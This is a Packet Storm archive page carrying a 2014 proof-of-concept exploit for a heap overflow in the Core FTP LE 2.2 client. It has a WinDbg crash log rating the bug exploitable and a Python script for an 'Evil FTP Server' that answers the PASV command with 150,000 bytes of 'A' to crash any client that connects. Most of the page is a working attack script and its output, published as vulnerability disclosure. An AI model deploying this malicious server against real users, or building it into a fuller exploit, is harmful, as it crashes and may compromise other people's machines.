exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Core FTP LE 2.2 Heap Overflow

Core FTP LE 2.2 Heap Overflow
Posted Jun 13, 2014
Authored by Gabor Seljan

Core FTP LE version 2.2 suffers from a heap overflow vulnerability.

tags | exploit, overflow
SHA-256 | ead49735f50318542245f54c6d25ec0dd04028d80682db796236c4da0d1082ff

Core FTP LE 2.2 Heap Overflow

Change Mirror Download
#-----------------------------------------------------------------------------#
# Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC #
# Date: Jun 11 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.coreftp.com/ #
# Version: 2.2 build 1798 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#

# In some cases the client does not do proper bounds checking on server
# responses. An overly long reply from the server causes a heap overflow and
# crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
# all vulnerable and possibly other commands are too.

'''
HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
eip=7c90120e esp=015297ac ebp=015297b0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:002> dd eax
00f17bc8 004b0804 011f0733 20373232 41414141
00f17bd8 41414141 41414141 41414141 41414141
00f17be8 41414141 41414141 41414141 41414141
00f17bf8 41414141 41414141 41414141 41414141
00f17c08 41414141 41414141 41414141 41414141
00f17c18 41414141 41414141 41414141 41414141
00f17c28 41414141 41414141 41414141 41414141
00f17c38 41414141 41414141 41414141 41414141
0:002> g
HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:002> g
(9d8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlOemStringToUnicodeString+0x277:
7c9276dc 8901 mov dword ptr [ecx],eax ds:0023:41414141=????????
0:002> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)

User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b mov ecx,dword ptr [ebx] ds:0023:41414141=????????
0:002> dd eax
00f1bbf0 41414141 41414141 41414141 41414141
00f1bc00 41414141 41414141 41414141 41414141
00f1bc10 41414141 41414141 41414141 41414141
00f1bc20 41414141 41414141 41414141 41414141
00f1bc30 41414141 41414141 41414141 41414141
00f1bc40 41414141 41414141 41414141 41414141
00f1bc50 41414141 41414141 41414141 41414141
00f1bc60 41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8 41414141 41414141 41414141 41414141
00f1bbf8 41414141 41414141 41414141 41414141
00f1bc08 41414141 41414141 41414141 41414141
00f1bc18 41414141 41414141 41414141 41414141
00f1bc28 41414141 41414141 41414141 41414141
00f1bc38 41414141 41414141 41414141 41414141
00f1bc48 41414141 41414141 41414141 41414141
00f1bc58 41414141 41414141 41414141 41414141
'''

#!/usr/bin/python

from socket import *

host = "0.0.0.0"
port = 21
payload = "A" * 150000

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, 21))
s.listen(1)

print "[+] Evil FTP Server started"
print "[+] Listening on port %d..." % port

conn, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
conn.send("220 Welcome to Evil FTP Server\r\n")
conn.recv(1024) # Receive USER
conn.send("331 Need password for whatever user\r\n")
conn.recv(1024) # Receive PASS
conn.send("230 User logged in\r\n")
conn.recv(1024) # Receive SYST
conn.send("215 UNIX Type: L8\r\n")
conn.recv(1024) # Receive PWD
conn.send("257 \"/\" is current directory\r\n")

try:
print "[+] Sending evil response for 'PASV' command..."
conn.recv(1024) # Receive PASV
conn.send("227 "+payload+"\r\n")
conn.recv(1024)
except error as e:
if e.errno == 10054:
print "[+] Client crashed!"
else:
print e
finally:
conn.close()
s.close()


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close